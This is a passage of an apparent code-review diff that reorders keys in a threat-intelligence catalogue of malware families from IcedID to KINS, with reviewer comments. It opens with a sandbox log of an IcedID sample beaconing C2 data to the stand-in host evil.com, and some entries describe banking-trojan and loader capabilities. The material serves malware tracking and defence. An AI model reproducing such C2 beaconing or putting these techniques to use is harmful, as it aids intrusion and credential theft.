argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] 
[172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" + "value": 
"IcedID" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", - "value": "IcedID Downloader", - "description": "" + "value": "IcedID Downloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", "http://www.kz-cert.kz/page/502" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", - "value": "Icefog", - "description": "" + "value": "Icefog" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", - "value": "Ice IX", - "description": "" + "value": "Ice IX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", "https://isc.sans.edu/diary/22766" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3afecded-3461-45f9-8159-e8328e56a916", - "value": "IDKEY", - "description": "" + "value": "IDKEY" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"3b746f77-214b-44f9-9ef2-0ae6b52561d6", - "value": "IISniff", - "description": "" + "value": "IISniff" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", - "value": "Imecab", - "description": "" + "value": "Imecab" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", - "value": "Imminent Monitor RAT", - "description": "" + "value": "Imminent Monitor RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Foudre" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", 
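Review bot: `IcedID Downloader` is filed as a standalone family with an empty `description`, and one of its two non-Malpedia references (the Intezer article) is also cited on the `IcedID` entry in the previous hunk, so a reader cannot tell whether this is a distinct loader stage or the same sample set recorded twice. A single sentence saying what separates the downloader from the IcedID core — or, if this cluster format supports it, a `related` link to the IcedID uuid `26f5afaf-0bd7-4741-91ab-917bdd837330` — would settle that. The `Infy` entry at the end of this hunk continues into the next one.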
@@ -8037,46 +8037,44 @@ "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" - ] + ], + "synonyms": [ + "Foudre" + ], + "type": [] }, "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", - "value": "Infy", - "description": "" + "value": "Infy" }, { + "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", - "value": "InnaputRAT", - "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." 
+ "value": "InnaputRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", - "value": "InvisiMole", - "description": "" + "value": "InvisiMole" }, { + "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. 
The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { - "synonyms": [ - "Gozi ISFB", - "IAP", - "Pandemyia" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", 
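Review bot: The ISFB description opens with `2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)` but the `(*)` marker never resolves to a footnote, so whatever caveat the author meant to attach is lost; either add the footnote text or drop the marker. The name is spelled `Pandemiya` in the RSA reference slug cited for this entry, while the `synonyms` list (removed here and re-added sorted in the next hunk) carries `Pandemyia`; since tag matching keys on synonyms, verify which spelling the vendor used and, if both circulate, list both. Also `which was merge with Pony` should read `which was merged with Pony`. The ISFB entry's `refs` and `synonyms` continue into the next hunk.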
@@ -8092,529 +8090,531 @@
 "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
 "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
 "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/"
- ]
+ ],
+ "synonyms": [
+ "Gozi ISFB",
+ "IAP",
+ "Pandemyia"
+ ],
+ "type": []
 },
 "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d",
- "value": "ISFB",
- "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information."
+ "value": "ISFB"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
 "http://www.clearskysec.com/ismagent/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2",
- "value": "ISMAgent",
- "description": ""
+ "value": "ISMAgent"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor",
 "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
 "http://www.clearskysec.com/greenbug/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b",
- "value": "ISMDoor",
- "description": ""
+ "value": "ISMDoor"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger",
 "https://www.zscaler.com/blogs/research/ispy-keylogger"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070",
- "value": "iSpy Keylogger",
- "description": ""
+ "value": "iSpy Keylogger"
 },
 {
+ "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer",
 "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989",
- "value": "ISR Stealer",
- "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public"
+ "value": "ISR Stealer"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
 "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a",
- "value": "IsSpace",
- "description": ""
+ "value": "IsSpace"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2",
- "value": "JackPOS",
- "description": ""
+ "value": "JackPOS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff",
 "http://malware-traffic-analysis.net/2017/05/16/index.html",
 "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart",
 "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2c51a717-726b-4813-9fcc-1265694b128e",
- "value": "Jaff",
- "description": ""
+ "value": "Jaff"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9",
- "value": "Jager Decryptor",
- "description": ""
+ "value": "Jager Decryptor"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Reconcyc"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku",
 "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146",
 "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf"
- ]
+ ],
+ "synonyms": [
+ "Reconcyc"
+ ],
+ "type": []
 },
 "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112",
- "value": "Jaku",
- "description": ""
+ "value": "Jaku"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus",
 "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea",
- "value": "Jasus",
- "description": ""
+ "value": "Jasus"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9",
- "value": "Jigsaw",
- "description": ""
+ "value": "Jigsaw"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy",
 "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e",
- "value": "Jimmy",
- "description": ""
+ "value": "Jimmy"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap",
 "https://www.us-cert.gov/ncas/alerts/TA18-149A",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
 "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b",
- "value": "Joanap",
- "description": ""
+ "value": "Joanap"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao",
 "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6",
- "value": "Joao",
- "description": ""
+ "value": "Joao"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob",
 "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631",
- "value": "Jolob",
- "description": ""
+ "value": "Jolob"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker",
 "http://marcmaiffret.com/vault7/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a",
- "value": "JQJSNICKER",
- "description": ""
+ "value": "JQJSNICKER"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot",
 "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2",
- "value": "JripBot",
- "description": ""
+ "value": "JripBot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent",
 "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb",
- "value": "KAgent",
- "description": ""
+ "value": "KAgent"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany",
 "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb",
- "value": "Karagany",
- "description": ""
+ "value": "Karagany"
 },
 {
+ "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader",
 "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/",
 "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8",
- "value": "Kardon Loader",
- "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base."
+ "value": "Kardon Loader"
 },
 {
+ "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius",
 "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/",
 "https://research.checkpoint.com/banking-trojans-development/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf",
- "value": "Karius",
- "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n"
+ "value": "Karius"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent",
 "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
 "https://www.threatconnect.com/blog/kasperagent-malware-campaign/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c",
- "value": "KasperAgent",
- "description": ""
+ "value": "KasperAgent"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar",
 "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca",
- "value": "Kazuar",
- "description": ""
+ "value": "Kazuar"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755",
- "value": "Kegotip",
- "description": ""
+ "value": "Kegotip"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos",
 "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
 "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
 "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
 "https://en.wikipedia.org/wiki/Kelihos_botnet"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea",
- "value": "Kelihos",
- "description": ""
+ "value": "Kelihos"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "TSSL"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy",
 "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
 "https://citizenlab.ca/2016/11/parliament-keyboy/",
 "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/"
- ]
+ ],
+ "synonyms": [
+ "TSSL"
+ ],
+ "type": []
 },
 "uuid": "28c13455-7f95-40a5-9568-1e8732503507",
- "value": "KeyBoy",
- "description": ""
+ "value": "KeyBoy"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3",
 "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong",
 "https://twitter.com/smoothimpact/status/773631684038107136",
 "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "68039fbe-2eee-4666-b809-32a011e9852a",
- "value": "APT3 Keylogger",
- "description": ""
+ "value": "APT3 Keylogger"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
 "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
- "value": "KEYMARBLE",
- "description": ""
+ "value": "KEYMARBLE"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat",
 "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor",
 "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047",
- "value": "KHRAT",
- "description": ""
+ "value": "KHRAT"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac",
 "https://www.group-ib.com/resources/threat-research/silence.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493",
- "value": "Kikothac",
- "description": ""
+ "value": "Kikothac"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk",
 "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027",
- "value": "KillDisk",
- "description": ""
+ "value": "KillDisk"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Kasper Internet Non-Security",
- "Maple"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins",
 "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
 "https://github.com/nyx0/KINS",
 "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/",
 "https://www.youtube.com/watch?v=C-dEOt0GzSE"
- ]
+ ],
+ "synonyms": [
+ "Kasper Internet Non-Security",
+ "Maple"
+ ],
+ "type": []
 },
